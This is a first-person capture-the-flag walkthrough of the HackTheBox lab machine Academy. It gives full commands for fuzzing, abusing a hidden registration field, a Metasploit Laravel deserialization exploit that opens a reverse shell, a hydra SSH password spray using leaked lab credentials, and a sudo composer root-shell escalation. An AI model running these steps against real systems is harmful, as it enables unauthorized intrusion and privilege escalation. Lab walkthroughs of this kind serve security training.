Academy-HackTheBox
Hey, this is a write up for ‘the machine Academy’ on HackTheBox.
Initially I would start with enumerating the target using nmap. I used the following commands
nmap -p- --min-rate 10000 -oA nmap_all_tcp 10.10.10.215
nmap -p 22,80,33060 -sC -sV 10.10.10.215
Hence I found three open ports. Since port 80 is open I thought I might just pay a visit. After visiting the website, it was being redirected to academy.htb , so I added the domain name for 10.10.10.215 in etc/hosts.
Whenever I visit a website for CTF’s I always have my burp suite setup to monitor the requests. In the home page there are two buttons ‘LOGIN’ and ‘REGISTER’.
I clicked on ‘login’ and tried some of the default credentials and nothing worked. The source of the login page was also checked but didn’t find anything interesting. Then I registered myself and logged in.
I spent a lot of time analysing the webpage and found not a single thing. Then I started viewing the page source of every single page. Finally, found a hidden input field on the registration page.
I opened the inspect element tab and changed the input type to text , value to 1 and registered another user called ‘boy’.
Nothing happened, I could just login. But there is something odd about that input tag. Therefore I used wfuzz to fuzz the website using the following command.
wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://academy.htb/FUZZ --hc 404
I visited http://academy.htb/admin.php and tried logging in with default credentials and also with the users that I’ve created. The second user I created could successfully login to the admin page.
The last row in the table mentions that there is a webpage with some issues. I will add that webpage to my /etc/hosts. After adding, I visited dev-staging-01.academy.htb
From this website we could see that it is showing some Laravel error. From searching the webpage I found some interesting variables like app_key, database username and password.
I tried connecting to the database but couldn’t get the connection. Then I tried googling if there is any vulnerability for Laravel and found having a remote code execution vulnerability for some versions. But I couldn’t find the version that’s used here. Anyway, I thought I would give it a try and opened msfconsole and used the following commands.
msfconsole
search laravel
use exploit/unix/http/laravel_token_unserialize_exec
show options
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set rhosts 10.10.10.215
set vhost dev-staging-01.academy.htb
set lhost 10.10.14.31
run
After running the exploit I got a shell.
I shifted to a more stablised python shell using the following command.
python3 -c 'import pty; pty.spawn("/bin/sh")'
After looking into a lot of files I found a file ‘.env’
I still couldn’t connect to the database. Then after many tries I thought I might brute force this password for all the users. After viewing the \home directory, I got the following users
I saved these names in users.txt and saved the password ‘mySup3rP4s5w0rd!!’ in another file password.txt. Then used the following command on hydra to brute force.
hydra -L users.txt -P password.txt 10.10.10.215 -t 4 ssh
After logging in, I got the user.txt flag.
Privilege Escalation
After logging in as cry0l1t3, I couldn’t get the root flag. Therefore, I checked almost everything containing a password for root or similar things but didn’t get anything. In the meantime I copied linpeas.sh from my local machine to the academy machine. Linux Privilege Escalation Awesome Script (LinPeas) is a script to find out different ways to escalate privileges. I copied linpeas.sh from my local machine using the following command.
scp linpeas.sh cry0l1t3@academy.htb:/tmp
I entered the password for cry0l1t3 and went inside /tmp and ran ./linpeas.sh. It gave me the following output
Then I tried switching to ‘mrb3n’ using the following password ‘mrb3n_Ac@d3my!’ and got access. The first thing I did was tried accessing the root.txt file but I still didn’t have permissions. Then I tried ‘sudo -l’ to see the sudo permissions and found this.
I found that mrb3n could run composer. I googled about it exploits and gave me the following results.
I visited this website and ran the following commands as ‘mrb3n’ as mentioned there
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
This gave me root access and I could access the root.txt from /root. Happy hacking and thanks for the read.